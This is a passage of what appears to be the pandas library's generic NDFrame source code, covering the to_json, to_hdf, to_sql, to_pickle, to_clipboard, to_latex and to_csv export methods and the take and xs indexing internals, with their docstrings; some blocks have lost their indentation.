        na_rep=na_rep,
        cols=columns,
        header=header,
        float_format=float_format,
        index=index,
        index_label=index_label,
        merge_cells=merge_cells,
        inf_rep=inf_rep,
    )
    excel_formatter.write(
        excel_writer,
        sheet_name=sheet_name,
        startrow=startrow,
        startcol=startcol,
        freeze_panes=freeze_panes,
        engine=engine,
    )
def to_json(
    self,
    path_or_buf: Optional[FilePathOrBuffer] = None,
    orient: Optional[str] = None,
    date_format: Optional[str] = None,
    double_precision: int = 10,
    force_ascii: bool_t = True,
    date_unit: str = "ms",
    default_handler: Optional[Callable[[Any], JSONSerializable]] = None,
    lines: bool_t = False,
    compression: Optional[str] = "infer",
    index: bool_t = True,
    indent: Optional[int] = None,
) -> Optional[str]:
    """
    Convert the object to a JSON string.

    Note NaN's and None will be converted to null and datetime objects
    will be converted to UNIX timestamps.

    Parameters
    ----------
    path_or_buf : str or file handle, optional
        File path or object. If not specified, the result is returned
        as a string.
    orient : str
        Indication of expected JSON string format. For Series the
        default is 'index' and allowed values are
        {'split', 'records', 'index', 'table'}; for DataFrame the
        default is 'columns' and allowed values are
        {'split', 'records', 'index', 'columns', 'values', 'table'}.
        'split' -> {'index' -> [index], 'columns' -> [columns],
        'data' -> [values]}; 'records' -> list of
        {column -> value} dicts; 'index' -> {index -> {column -> value}};
        'columns' -> {column -> {index -> value}}; 'values' -> just the
        values array; 'table' -> {'schema': {schema}, 'data': {data}}
        where the data component is like ``orient='records'``.
    date_format : {None, 'epoch', 'iso'}
        Type of date conversion. 'epoch' = epoch milliseconds,
        'iso' = ISO8601. The default depends on `orient`: 'iso' for
        ``orient='table'``, 'epoch' for everything else.
    double_precision : int, default 10
        Number of decimal places used when encoding floating point
        values.
    force_ascii : bool, default True
        Force encoded string to be ASCII.
    date_unit : str, default 'ms' (milliseconds)
        Time unit to encode to; governs timestamp and ISO8601
        precision. One of 's', 'ms', 'us', 'ns'.
    default_handler : callable, default None
        Handler to call if an object cannot otherwise be converted to a
        suitable format for JSON. Receives the object to convert and
        should return a serialisable object.
    lines : bool, default False
        If 'orient' is 'records', write out line-delimited json.
        Raises ValueError for other orients since they are not
        list-like.
    compression : {'infer', 'gzip', 'bz2', 'zip', 'xz', None}
        Compression to use in the output file; only used when the first
        argument is a filename. By default inferred from the filename.
    index : bool, default True
        Whether to include the index values in the JSON string.
        ``index=False`` is only supported when orient is 'split' or
        'table'.
    indent : int, optional
        Length of whitespace used to indent each record.

        .. versionadded:: 1.0.0

    Returns
    -------
    None or str
        The resulting json format as a string when `path_or_buf` is
        None, otherwise None.

    See Also
    --------
    read_json : Convert a JSON string to pandas object.

    Notes
    -----
    The behavior of ``indent=0`` varies from the stdlib, which does not
    indent the output but does insert newlines. Currently, ``indent=0``
    and the default ``indent=None`` are equivalent in pandas, though
    this may change in a future release.
    """
    from pandas.io import json

    if date_format is None:
        # 'table' orient pins dates to ISO8601; all other orients
        # default to epoch timestamps.
        date_format = "iso" if orient == "table" else "epoch"

    # Validate before normalizing None -> 0 below.
    config.is_nonnegative_int(indent)

    return json.to_json(
        path_or_buf=path_or_buf,
        obj=self,
        orient=orient,
        date_format=date_format,
        double_precision=double_precision,
        force_ascii=force_ascii,
        date_unit=date_unit,
        default_handler=default_handler,
        lines=lines,
        compression=compression,
        index=index,
        indent=indent or 0,
    )
def to_hdf(
    self,
    path_or_buf,
    key: str,
    mode: str = "a",
    complevel: Optional[int] = None,
    complib: Optional[str] = None,
    append: bool_t = False,
    format: Optional[str] = None,
    index: bool_t = True,
    min_itemsize: Optional[Union[int, Dict[str, int]]] = None,
    nan_rep=None,
    dropna: Optional[bool_t] = None,
    data_columns: Optional[List[str]] = None,
    errors: str = "strict",
    encoding: str = "UTF-8",
) -> None:
    """
    Write the contained data to an HDF5 file using HDFStore.

    Hierarchical Data Format (HDF) is self-describing, allowing an
    application to interpret the structure and contents of a file with
    no outside information. One HDF file can hold a mix of related
    objects which can be accessed as a group or as individual objects.
    To add another DataFrame or Series to an existing HDF file use
    append mode and a different key. For more information see the
    :ref:`user guide <io.hdf5>`.

    Parameters
    ----------
    path_or_buf : str or pandas.HDFStore
        File path or HDFStore object.
    key : str
        Identifier for the group in the store.
    mode : {'a', 'w', 'r+'}, default 'a'
        Mode to open file: 'w' creates a new file (an existing file
        with the same name is deleted); 'a' opens for reading and
        writing, creating the file if it does not exist; 'r+' is like
        'a' but the file must already exist.
    complevel : {0-9}, optional
        Compression level for data. 0 disables compression.
    complib : {'zlib', 'lzo', 'bzip2', 'blosc'}, default 'zlib'
        Compression library to use. Additional Blosc compressors are
        supported (default if no compressor specified:
        'blosc:blosclz'): {'blosc:blosclz', 'blosc:lz4',
        'blosc:lz4hc', 'blosc:snappy', 'blosc:zlib', 'blosc:zstd'}.
        An unavailable compression library raises a ValueError.
    append : bool, default False
        For Table formats, append the input data to the existing.
    format : {'fixed', 'table', None}, default 'fixed'
        'fixed': fast writing/reading, not appendable nor searchable;
        'table': PyTables Table structure, possibly slower but allows
        searching/selecting subsets; None checks
        pd.get_option('io.hdf.default_format'), falling back to
        'fixed'.
    index : bool, default True
        Whether to write the index.
    min_itemsize : dict or int, optional
        Map column names to minimum string sizes for columns.
    nan_rep : Any, optional
        How to represent null values as str. Not allowed with
        append=True.
    dropna : bool, optional
        Whether to drop all-NaN rows.
    data_columns : list of columns or True, optional
        Columns to create as indexed data columns for on-disk queries,
        or True to use all columns. By default only the axes of the
        object are indexed. See :ref:`io.hdf5-query-data-columns`.
        Applicable only to format='table'.
    errors : str, default 'strict'
        How encoding and decoding errors are handled; see the errors
        argument of :func:`open` for the full list of options.
    encoding : str, default "UTF-8"

    See Also
    --------
    DataFrame.read_hdf : Read from HDF file.
    DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
    DataFrame.to_sql : Write to a sql table.
    DataFrame.to_feather : Write out feather-format for DataFrames.
    DataFrame.to_csv : Write out to a csv file.
    """
    from pandas.io import pytables

    # Collect the keyword options once, then hand the object off to the
    # pytables writer.
    hdf_kwargs = dict(
        mode=mode,
        complevel=complevel,
        complib=complib,
        append=append,
        format=format,
        index=index,
        min_itemsize=min_itemsize,
        nan_rep=nan_rep,
        dropna=dropna,
        data_columns=data_columns,
        errors=errors,
        encoding=encoding,
    )
    pytables.to_hdf(path_or_buf, key, self, **hdf_kwargs)
def to_sql(
    self,
    name: str,
    con,
    schema=None,
    if_exists: str = "fail",
    index: bool_t = True,
    index_label=None,
    chunksize=None,
    dtype=None,
    method=None,
) -> None:
    """
    Write records stored in a DataFrame to a SQL database.

    Databases supported by SQLAlchemy [1]_ are supported. Tables can be
    newly created, appended to, or overwritten.

    Parameters
    ----------
    name : str
        Name of SQL table.
    con : sqlalchemy.engine.Engine or sqlite3.Connection
        Using SQLAlchemy makes it possible to use any DB supported by
        that library. Legacy support is provided for
        sqlite3.Connection objects. The user is responsible for engine
        disposal and connection closure for the SQLAlchemy connectable;
        see `here
        <https://docs.sqlalchemy.org/en/13/core/connections.html>`_.
    schema : str, optional
        Schema to use (if the database flavor supports this). If None,
        use the default schema.
    if_exists : {'fail', 'replace', 'append'}, default 'fail'
        Behavior when the table already exists: 'fail' raises a
        ValueError; 'replace' drops the table before inserting new
        values; 'append' inserts new values into the existing table.
    index : bool, default True
        Write DataFrame index as a column, using `index_label` as the
        column name in the table.
    index_label : str or sequence, default None
        Column label for index column(s). If None (default) and `index`
        is True, the index names are used. Give a sequence if the
        DataFrame uses MultiIndex.
    chunksize : int, optional
        Number of rows per batch to write at a time. By default, all
        rows are written at once.
    dtype : dict or scalar, optional
        Datatype for columns. A dict maps column names to SQLAlchemy
        types (or strings for sqlite3 legacy mode); a scalar is applied
        to all columns.
    method : {None, 'multi', callable}, optional
        SQL insertion clause: None uses standard one-per-row ``INSERT``;
        'multi' passes multiple values in a single ``INSERT``; a
        callable with signature ``(pd_table, conn, keys, data_iter)``
        can be supplied — see :ref:`insert method <io.sql.method>`.

    Raises
    ------
    ValueError
        When the table already exists and `if_exists` is 'fail' (the
        default).

    See Also
    --------
    read_sql : Read a DataFrame from a table.

    Notes
    -----
    Timezone aware datetime columns will be written as
    ``Timestamp with timezone`` type with SQLAlchemy if supported by
    the database. Otherwise, the datetimes will be stored as timezone
    unaware timestamps local to the original timezone.

    References
    ----------
    .. [1] https://docs.sqlalchemy.org
    .. [2] https://www.python.org/dev/peps/pep-0249/
    """
    from pandas.io import sql

    sql.to_sql(
        self,
        name,
        con,
        schema=schema,
        if_exists=if_exists,
        index=index,
        index_label=index_label,
        chunksize=chunksize,
        dtype=dtype,
        method=method,
    )
def to_pickle(
    self,
    path,
    compression: Optional[str] = "infer",
    protocol: int = pickle.HIGHEST_PROTOCOL,
) -> None:
    """
    Pickle (serialize) object to file.

    Parameters
    ----------
    path : str
        File path where the pickled object will be stored.
    compression : {'infer', 'gzip', 'bz2', 'zip', 'xz', None}, \
default 'infer'
        Compression to use in the output file. By default, inferred
        from the file extension in the specified path.
    protocol : int
        Protocol used by the pickler, default HIGHEST_PROTOCOL (see
        [1]_ paragraph 12.1.2). Possible values are 0, 1, 2, 3, 4; a
        negative value is equivalent to HIGHEST_PROTOCOL.

        .. [1] https://docs.python.org/3/library/pickle.html.

    See Also
    --------
    read_pickle : Load pickled pandas object (or any object) from file.
    DataFrame.to_hdf : Write DataFrame to an HDF5 file.
    DataFrame.to_sql : Write DataFrame to a SQL database.
    DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
    """
    # Aliased import: the io-level writer shares this method's name.
    from pandas.io.pickle import to_pickle as pickle_writer

    pickle_writer(self, path, compression=compression, protocol=protocol)
def to_clipboard(
    self, excel: bool_t = True, sep: Optional[str] = None, **kwargs
) -> None:
    r"""
    Copy object to the system clipboard.

    Write a text representation of the object to the system clipboard,
    which can then be pasted into Excel, for example.

    Parameters
    ----------
    excel : bool, default True
        Produce output in a csv format for easy pasting into excel:
        True uses the provided separator for csv pasting; False writes
        a string representation of the object to the clipboard.
    sep : str, default ``'\t'``
        Field delimiter.
    **kwargs
        These parameters will be passed to DataFrame.to_csv.

    See Also
    --------
    DataFrame.to_csv : Write a DataFrame to a comma-separated values
        (csv) file.
    read_clipboard : Read text from clipboard and pass to read_table.

    Notes
    -----
    Platform requirements: Linux needs `xclip` or `xsel` (with `PyQt4`
    modules); Windows and OS X need nothing extra.
    """
    from pandas.io import clipboards

    clipboards.to_clipboard(self, excel=excel, sep=sep, **kwargs)
def to_xarray(self):
    """
    Return an xarray object from the pandas object.

    Returns
    -------
    xarray.DataArray or xarray.Dataset
        A DataArray when the object is one-dimensional (a Series), a
        Dataset otherwise (a DataFrame).

    See Also
    --------
    DataFrame.to_hdf : Write DataFrame to an HDF5 file.
    DataFrame.to_parquet : Write a DataFrame to the binary parquet format.

    Notes
    -----
    See the `xarray docs <https://xarray.pydata.org/en/stable/>`__.
    xarray is an optional dependency; importing it lazily raises a
    helpful error when it is not installed.
    """
    xarray = import_optional_dependency("xarray")

    if self.ndim == 1:
        # Series -> DataArray
        return xarray.DataArray.from_series(self)
    # DataFrame -> Dataset
    return xarray.Dataset.from_dataframe(self)
@Substitution(returns=fmt.return_docstring)
def to_latex(
    self,
    buf=None,
    columns=None,
    col_space=None,
    header=True,
    index=True,
    na_rep="NaN",
    formatters=None,
    float_format=None,
    sparsify=None,
    index_names=True,
    bold_rows=False,
    column_format=None,
    longtable=None,
    escape=None,
    encoding=None,
    decimal=".",
    multicolumn=None,
    multicolumn_format=None,
    multirow=None,
    caption=None,
    label=None,
):
    r"""
    Render object to a LaTeX tabular, longtable, or nested table/tabular.

    Requires ``\usepackage{booktabs}``. The output can be copy/pasted
    into a main LaTeX document or read from an external file
    with ``\input{table.tex}``.

    .. versionchanged:: 0.20.2
       Added to Series.
    .. versionchanged:: 1.0.0
       Added caption and label arguments.

    Parameters
    ----------
    buf : str, Path or StringIO-like, optional, default None
        Buffer to write to. If None, the output is returned as a string.
    columns : list of label, optional
        The subset of columns to write. Writes all columns by default.
    col_space : int, optional
        The minimum width of each column.
    header : bool or list of str, default True
        Write out the column names. If a list of strings is given, it
        is assumed to be aliases for the column names.
    index : bool, default True
        Write row names (index).
    na_rep : str, default 'NaN'
        Missing data representation.
    formatters : list of functions or dict of {str: function}, optional
        Formatter functions to apply to columns' elements by position
        or name; each must return a unicode string. A list must have
        length equal to the number of columns.
    float_format : one-parameter function or str, optional, default None
        Formatter for floating point numbers, e.g.
        ``float_format="%%.2f"`` or ``float_format="{:0.2f}".format``.
    sparsify : bool, optional
        Set to False for a DataFrame with a hierarchical index to print
        every multiindex key at each row. By default read from the
        config module.
    index_names : bool, default True
        Prints the names of the indexes.
    bold_rows : bool, default False
        Make the row labels bold in the output.
    column_format : str, optional
        The columns format as specified in `LaTeX table format
        <https://en.wikibooks.org/wiki/LaTeX/Tables>`__, e.g. 'rcl' for
        3 columns. By default 'l' is used for all columns except
        numeric ones, which default to 'r'.
    longtable : bool, optional
        Use a longtable environment instead of tabular (requires
        ``\usepackage{longtable}``). Default read from the config
        module.
    escape : bool, optional
        When False, do not escape latex special characters in column
        names. Default read from the config module.
    encoding : str, optional
        Encoding for the output file; defaults to 'utf-8'.
    decimal : str, default '.'
        Character recognized as decimal separator, e.g. ',' in Europe.
    multicolumn : bool, default True
        Use \multicolumn to enhance MultiIndex columns. Default read
        from the config module.
    multicolumn_format : str, default 'l'
        Alignment for multicolumns, similar to `column_format`. Default
        read from the config module.
    multirow : bool, default False
        Use \multirow to enhance MultiIndex rows (requires
        ``\usepackage{multirow}``); prints centered labels across the
        contained rows, separating groups via clines. Default read
        from the config module.
    caption : str, optional
        The LaTeX caption placed inside ``\caption{}`` in the output.

        .. versionadded:: 1.0.0
    label : str, optional
        The LaTeX label placed inside ``\label{}``; used with
        ``\ref{}`` in the main ``.tex`` file.

        .. versionadded:: 1.0.0
    %(returns)s
    See Also
    --------
    DataFrame.to_string : Render a DataFrame to a console-friendly
        tabular output.
    DataFrame.to_html : Render a DataFrame as an HTML table.
    """
    # Series are rendered through the frame path.
    frame = self.to_frame() if self.ndim == 1 else self

    # Any option left as None falls back to the pandas config default.
    latex_opts = {
        "longtable": longtable,
        "escape": escape,
        "multicolumn": multicolumn,
        "multicolumn_format": multicolumn_format,
        "multirow": multirow,
    }
    for opt_name, opt_value in latex_opts.items():
        if opt_value is None:
            latex_opts[opt_name] = config.get_option(f"display.latex.{opt_name}")

    formatter = DataFrameFormatter(
        frame,
        columns=columns,
        col_space=col_space,
        na_rep=na_rep,
        header=header,
        index=index,
        formatters=formatters,
        float_format=float_format,
        bold_rows=bold_rows,
        sparsify=sparsify,
        index_names=index_names,
        escape=latex_opts["escape"],
        decimal=decimal,
    )
    return formatter.to_latex(
        buf=buf,
        column_format=column_format,
        longtable=latex_opts["longtable"],
        encoding=encoding,
        multicolumn=latex_opts["multicolumn"],
        multicolumn_format=latex_opts["multicolumn_format"],
        multirow=latex_opts["multirow"],
        caption=caption,
        label=label,
    )
def to_csv(
self,
path_or_buf: Optional[FilePathOrBuffer] = None,
sep: str = ",",
na_rep: str = "",
float_format: Optional[str] = None,
columns: Optional[Sequence[Label]] = None,
header: Union[bool_t, List[str]] = True,
index: bool_t = True,
index_label: Optional[Union[bool_t, str, Sequence[Label]]] = None,
mode: str = "w",
encoding: Optional[str] = None,
compression: Optional[Union[str, Mapping[str, str]]] = "infer",
quoting: Optional[int] = None,
quotechar: str = '"',
line_terminator: Optional[str] = None,
chunksize: Optional[int] = None,
date_format: Optional[str] = None,
doublequote: bool_t = True,
escapechar: Optional[str] = None,
decimal: Optional[str] = ".",
) -> Optional[str]:
r"""
Write object to a comma-separated values (csv) file.
.. versionchanged:: 0.24.0
The order of arguments for Series was changed.
Parameters
----------
path_or_buf : str or file handle, default None
File path or object, if None is provided the result is returned as
a string. If a file object is passed it should be opened with
`newline=''`, disabling universal newlines.
.. versionchanged:: 0.24.0
Was previously named "path" for Series.
sep : str, default ','
String of length 1. Field delimiter for the output file.
na_rep : str, default ''
Missing data representation.
float_format : str, default None
Format string for floating point numbers.
columns : sequence, optional
Columns to write.
header : bool or list of str, default True
Write out the column names. If a list of strings is given it is
assumed to be aliases for the column names.
.. versionchanged:: 0.24.0
Previously defaulted to False for Series.
index : bool, default True
Write row names (index).
index_label : str or sequence, or False, default None
Column label for index column(s) if desired. If None is given, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the object uses MultiIndex. If
False do not print fields for index names. Use index_label=False
for easier importing in R.
mode : str
Python write mode, default 'w'.
encoding : str, optional
A string representing the encoding to use in the output file,
defaults to 'utf-8'.
compression : str or dict, default 'infer'
If str, represents compression mode. If dict, value at 'method' is
the compression mode. Compression mode may be any of the following
possible values: {'infer', 'gzip', 'bz2', 'zip', 'xz', None}. If
compression mode is 'infer' and `path_or_buf` is path-like, then
detect compression mode from the following extensions: '.gz',
'.bz2', '.zip' or '.xz'. (otherwise no compression). If dict given
and mode is 'zip' or inferred as 'zip', other entries passed as
additional compression options.
.. versionchanged:: 1.0.0
May now be a dict with key 'method' as compression mode
and other entries as additional compression options if
compression mode is 'zip'.
quoting : optional constant from csv module
Defaults to csv.QUOTE_MINIMAL. If you have set a `float_format`
then floats are converted to strings and thus csv.QUOTE_NONNUMERIC
will treat them as non-numeric.
quotechar : str, default '\"'
String of length 1. Character used to quote fields.
line_terminator : str, optional
The newline character or character sequence to use in the output
file. Defaults to `os.linesep`, which depends on the OS in which
this method is called ('\n' for linux, '\r\n' for Windows, i.e.).
.. versionchanged:: 0.24.0
chunksize : int or None
Rows to write at a time.
date_format : str, default None
Format string for datetime objects.
doublequote : bool, default True
Control quoting of `quotechar` inside a field.
escapechar : str, default None
String of length 1. Character used to escape `sep` and `quotechar`
when appropriate.
decimal : str, default '.'
Character recognized as decimal separator. E.g. use ',' for
European data.
Returns
-------
None or str
If path_or_buf is None, returns the resulting csv format as a
string. Otherwise returns None.
See Also
--------
read_csv : Load a CSV file into a DataFrame.
to_excel : Write DataFrame to an Excel file.
Examples
--------
>>> df = pd.DataFrame({'name': ['Raphael', 'Donatello'],
... 'mask': ['red', 'purple'],
... 'weapon': ['sai', 'bo staff']})
>>> df.to_csv(index=False)
'name,mask,weapon\nRaphael,red,sai\nDonatello,purple,bo staff\n'
Create 'out.zip' containing 'out.csv'
>>> compression_opts = dict(method='zip',
... archive_name='out.csv') # doctest: +SKIP
>>> df.to_csv('out.zip', index=False,
... compression=compression_opts) # doctest: +SKIP
"""
df = self if isinstance(self, ABCDataFrame) else self.to_frame()
from pandas.io.formats.csvs import CSVFormatter
formatter = CSVFormatter(
df,
path_or_buf,
line_terminator=line_terminator,
sep=sep,
encoding=encoding,
compression=compression,
quoting=quoting,
na_rep=na_rep,
float_format=float_format,
cols=columns,
header=header,
index=index,
index_label=index_label,
mode=mode,
chunksize=chunksize,
quotechar=quotechar,
date_format=date_format,
doublequote=doublequote,
escapechar=escapechar,
decimal=decimal,
)
formatter.save()
if path_or_buf is None:
return formatter.path_or_buf.getvalue()
return None
# ----------------------------------------------------------------------
# Lookup Caching
def _set_as_cached(self, item, cacher) -> None:
"""
Set the _cacher attribute on the calling object with a weakref to
cacher.
"""
self._cacher = (item, weakref.ref(cacher))
def _reset_cacher(self) -> None:
"""
Reset the cacher.
"""
if hasattr(self, "_cacher"):
del self._cacher
def _maybe_cache_changed(self, item, value) -> None:
"""
The object has called back to us saying maybe it has changed.
"""
self._data.set(item, value)
@property
def _is_cached(self) -> bool_t:
"""Return boolean indicating if self is cached or not."""
return getattr(self, "_cacher", None) is not None
def _get_cacher(self):
"""return my cacher or None"""
cacher = getattr(self, "_cacher", None)
if cacher is not None:
cacher = cacher[1]()
return cacher
    def _maybe_update_cacher(
        self, clear: bool_t = False, verify_is_copy: bool_t = True
    ) -> None:
        """
        See if we need to update our parent cacher; if clear, then clear our
        cache afterwards.

        Parameters
        ----------
        clear : bool, default False
            Clear the item cache.
        verify_is_copy : bool, default True
            Provide is_copy checks (may emit SettingWithCopyWarning).
        """
        cacher = getattr(self, "_cacher", None)
        if cacher is not None:
            # cacher is (item, weakref.ref(parent)); dereference the parent
            ref = cacher[1]()

            # we are trying to reference a dead referant, hence
            # a copy
            if ref is None:
                del self._cacher
            else:
                # Note: we need to call ref._maybe_cache_changed even in the
                # case where it will raise. (Uh, not clear why)
                try:
                    ref._maybe_cache_changed(cacher[0], self)
                except AssertionError:
                    # ref._data.setitem can raise
                    # AssertionError because of shape mismatch
                    pass
        if verify_is_copy:
            # warn/raise if this looks like chained assignment
            self._check_setitem_copy(stacklevel=5, t="referant")
        if clear:
            self._clear_item_cache()
def _clear_item_cache(self) -> None:
self._item_cache.clear()
# ----------------------------------------------------------------------
# Indexing Methods
def take(
self: FrameOrSeries, indices, axis=0, is_copy: Optional[bool_t] = None, **kwargs
) -> FrameOrSeries:
"""
Return the elements in the given *positional* indices along an axis.
This means that we are not indexing according to actual values in
the index attribute of the object. We are indexing according to the
actual position of the element in the object.
Parameters
----------
indices : array-like
An array of ints indicating which positions to take.
axis : {0 or 'index', 1 or 'columns', None}, default 0
The axis on which to select elements. ``0`` means that we are
selecting rows, ``1`` means that we are selecting columns.
is_copy : bool
Before pandas 1.0, ``is_copy=False`` can be specified to ensure
that the return value is an actual copy. Starting with pandas 1.0,
``take`` always returns a copy, and the keyword is therefore
deprecated.
.. deprecated:: 1.0.0
**kwargs
For compatibility with :meth:`numpy.take`. Has no effect on the
output.
Returns
-------
taken : same type as caller
An array-like containing the elements taken from the object.
See Also
--------
DataFrame.loc : Select a subset of a DataFrame by labels.
DataFrame.iloc : Select a subset of a DataFrame by positions.
numpy.take : Take elements from an array along an axis.
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=['name', 'class', 'max_speed'],
... index=[0, 2, 3, 1])
>>> df
name class max_speed
0 falcon bird 389.0
2 parrot bird 24.0
3 lion mammal 80.5
1 monkey mammal NaN
Take elements at positions 0 and 3 along the axis 0 (default).
Note how the actual indices selected (0 and 1) do not correspond to
our selected indices 0 and 3. That's because we are selecting the 0th
and 3rd rows, not rows whose indices equal 0 and 3.
>>> df.take([0, 3])
name class max_speed
0 falcon bird 389.0
1 monkey mammal NaN
Take elements at indices 1 and 2 along the axis 1 (column selection).
>>> df.take([1, 2], axis=1)
class max_speed
0 bird 389.0
2 bird 24.0
3 mammal 80.5
1 mammal NaN
We may take elements using negative integers for positive indices,
starting from the end of the object, just like with Python lists.
>>> df.take([-1, -2])
name class max_speed
1 monkey mammal NaN
3 lion mammal 80.5
"""
if is_copy is not None:
warnings.warn(
"is_copy is deprecated and will be removed in a future version. "
"'take' always returns a copy, so there is no need to specify this.",
FutureWarning,
stacklevel=2,
)
nv.validate_take(tuple(), kwargs)
self._consolidate_inplace()
new_data = self._data.take(
indices, axis=self._get_block_manager_axis(axis), verify=True
)
return self._constructor(new_data).__finalize__(self)
def _take_with_is_copy(self: FrameOrSeries, indices, axis=0) -> FrameOrSeries:
"""
Internal version of the `take` method that sets the `_is_copy`
attribute to keep track of the parent dataframe (using in indexing
for the SettingWithCopyWarning).
See the docstring of `take` for full explanation of the parameters.
"""
result = self.take(indices=indices, axis=axis)
# Maybe set copy if we didn't actually change the index.
if not result._get_axis(axis).equals(self._get_axis(axis)):
result._set_is_copy(self)
return result
    def xs(self, key, axis=0, level=None, drop_level: bool_t = True):
        """
        Return cross-section from the Series/DataFrame.

        This method takes a `key` argument to select data at a particular
        level of a MultiIndex.

        Parameters
        ----------
        key : label or tuple of label
            Label contained in the index, or partially in a MultiIndex.
        axis : {0 or 'index', 1 or 'columns'}, default 0
            Axis to retrieve cross-section on.
        level : object, defaults to first n levels (n=1 or len(key))
            In case of a key partially contained in a MultiIndex, indicate
            which levels are used. Levels can be referred by label or position.
        drop_level : bool, default True
            If False, returns object with same levels as self.

        Returns
        -------
        Series or DataFrame
            Cross-section from the original Series or DataFrame
            corresponding to the selected index levels.

        See Also
        --------
        DataFrame.loc : Access a group of rows and columns
            by label(s) or a boolean array.
        DataFrame.iloc : Purely integer-location based indexing
            for selection by position.

        Notes
        -----
        `xs` can not be used to set values.

        MultiIndex Slicers is a generic way to get/set values on
        any level or levels.
        It is a superset of `xs` functionality, see
        :ref:`MultiIndex Slicers <advanced.mi_slicers>`.

        Examples
        --------
        >>> d = {'num_legs': [4, 4, 2, 2],
        ...      'num_wings': [0, 0, 2, 2],
        ...      'class': ['mammal', 'mammal', 'mammal', 'bird'],
        ...      'animal': ['cat', 'dog', 'bat', 'penguin'],
        ...      'locomotion': ['walks', 'walks', 'flies', 'walks']}
        >>> df = pd.DataFrame(data=d)
        >>> df = df.set_index(['class', 'animal', 'locomotion'])
        >>> df
                                   num_legs  num_wings
        class  animal  locomotion
        mammal cat     walks              4          0
               dog     walks              4          0
               bat     flies              2          2
        bird   penguin walks              2          2

        Get values at specified index

        >>> df.xs('mammal')
                           num_legs  num_wings
        animal locomotion
        cat    walks              4          0
        dog    walks              4          0
        bat    flies              2          2

        Get values at several indexes

        >>> df.xs(('mammal', 'dog'))
                    num_legs  num_wings
        locomotion
        walks              4          0

        Get values at specified index and level

        >>> df.xs('cat', level=1)
                           num_legs  num_wings
        class  locomotion
        mammal walks              4          0

        Get values at several indexes and levels

        >>> df.xs(('bird', 'walks'),
        ...       level=[0, 'locomotion'])
                 num_legs  num_wings
        animal
        penguin         2          2

        Get values at specified column and axis

        >>> df.xs('num_wings', axis=1)
        class   animal   locomotion
        mammal  cat      walks         0
                dog      walks         0
                bat      flies         2
        bird    penguin  walks         2
        Name: num_wings, dtype: int64
        """
        axis = self._get_axis_number(axis)
        labels = self._get_axis(axis)
        if level is not None:
            # Explicit level(s): resolve key within those level(s) only.
            loc, new_ax = labels.get_loc_level(key, level=level, drop_level=drop_level)

            # create the tuple of the indexer
            _indexer = [slice(None)] * self.ndim
            _indexer[axis] = loc
            indexer = tuple(_indexer)

            result = self.iloc[indexer]
            # Replace the selected axis with the level-dropped version.
            setattr(result, result._get_axis_name(axis), new_ax)
            return result

        if axis == 1:
            # Column cross-section is just column selection.
            return self[key]

        self._consolidate_inplace()

        index = self.index
        if isinstance(index, MultiIndex):
            loc, new_index = self.index.get_loc_level(key, drop_level=drop_level)
        else:
            loc = self.index.get_loc(key)

            # A non-unique index can return an array indexer (boolean mask
            # or integer positions); select positionally in either case.
            if isinstance(loc, np.ndarray):
                if loc.dtype == np.bool_:
                    (inds,) = loc.nonzero()
                    return self._take_with_is_copy(inds, axis=axis)
                else:
                    return self._take_with_is_copy(loc, axis=axis)

            if not is_scalar(loc):
                new_index = self.index[loc]

        if is_scalar(loc):
            # In this case loc should be an integer
            if self.ndim == 1:
                # if we encounter an array-like and we only have 1 dim
                # that means that their are list/ndarrays inside the Series!
                # so just return them (GH 6394)
                return self._values[loc]

            # DataFrame row: fast single-row extraction from the manager,
            # boxed as a Series named after the row label.
            new_values = self._data.fast_xs(loc)

            result = self._constructor_sliced(
                new_values,
                index=self.columns,
                name=self.index[loc],
                dtype=new_values.dtype,
            )
        else:
            result = self.iloc[loc]
            result.index = new_index

        # this could be a view
        # but only in a single-dtyped view sliceable case
        result._set_is_copy(self, copy=not result._is_view)
        return result
_xs: Callable = xs
def __getitem__(self, item):
raise AbstractMethodError(self)
def _get_item_cache(self, item):
"""Return the cached item, item represents a label indexer."""
cache = self._item_cache
res = cache.get(item)
if res is None:
values = self._data.get(item)
res = self._box_item_values(item, values)
cache[item] = res
res._set_as_cached(item, self)
# for a chain
res._is_copy = self._is_copy
return res
def _box_item_values(self, key, values):
raise AbstractMethodError(self)
def _slice(self: FrameOrSeries, slobj: slice, axis=0) -> FrameOrSeries:
"""
Construct a slice of this container.
Slicing with this method is *always* positional.
"""
assert isinstance(slobj, slice), type(slobj)
axis = self._get_block_manager_axis(axis)
result = self._constructor(self._data.get_slice(slobj, axis=axis))
result = result.__finalize__(self)
# this could be a view
# but only in a single-dtyped view sliceable case
is_copy = axis != 0 or result._is_view
result._set_is_copy(self, copy=is_copy)
return result
def _set_item(self, key, value) -> None:
self._data.set(key, value)
self._clear_item_cache()
def _set_is_copy(self, ref, copy: bool_t = True) -> None:
if not copy:
self._is_copy = None
else:
assert ref is not None
self._is_copy = weakref.ref(ref)
    def _check_is_chained_assignment_possible(self) -> bool_t:
        """
        Check if we are a view, have a cacher, and are of mixed type.
        If so, then force a setitem_copy check.

        Should be called just near setting a value.

        Returns True if we are a view and are cached (the caller should
        then update the cacher after setting, since we are single-dtype);
        False otherwise.
        """
        if self._is_view and self._is_cached:
            ref = self._get_cacher()
            if ref is not None and ref._is_mixed_type:
                # Mixed-type parent: a write here cannot propagate back to
                # it, so always warn/raise regardless of copy status.
                self._check_setitem_copy(stacklevel=4, t="referant", force=True)
            return True
        elif self._is_copy:
            self._check_setitem_copy(stacklevel=4, t="referant")
        return False
    def _check_setitem_copy(self, stacklevel=4, t="setting", force=False):
        """
        Validate if we are doing a setitem on a chained copy.

        If you call this function, be sure to set the stacklevel such that
        the user will see the error *at the level of setting*.

        Parameters
        ----------
        stacklevel : int, default 4
            the level to show of the stack when the error is output
        t : str, the type of setting error
        force : bool, default False
            If True, then force showing an error.

        Notes
        -----
        It is technically possible to figure out that we are setting on
        a copy even WITH a multi-dtyped pandas object. In other words, some
        blocks may be views while other are not. Currently _is_view will ALWAYS
        return False for multi-blocks to avoid having to handle this case.

        df = DataFrame(np.arange(0,9), columns=['count'])
        df['group'] = 'b'

        # This technically need not raise SettingWithCopy if both are view
        # (which is not # generally guaranteed but is usually True. However,
        # this is in general not a good practice and we recommend using .loc.
        df.iloc[0:5]['group'] = 'a'
        """
        # return early if the check is not needed
        if not (force or self._is_copy):
            return

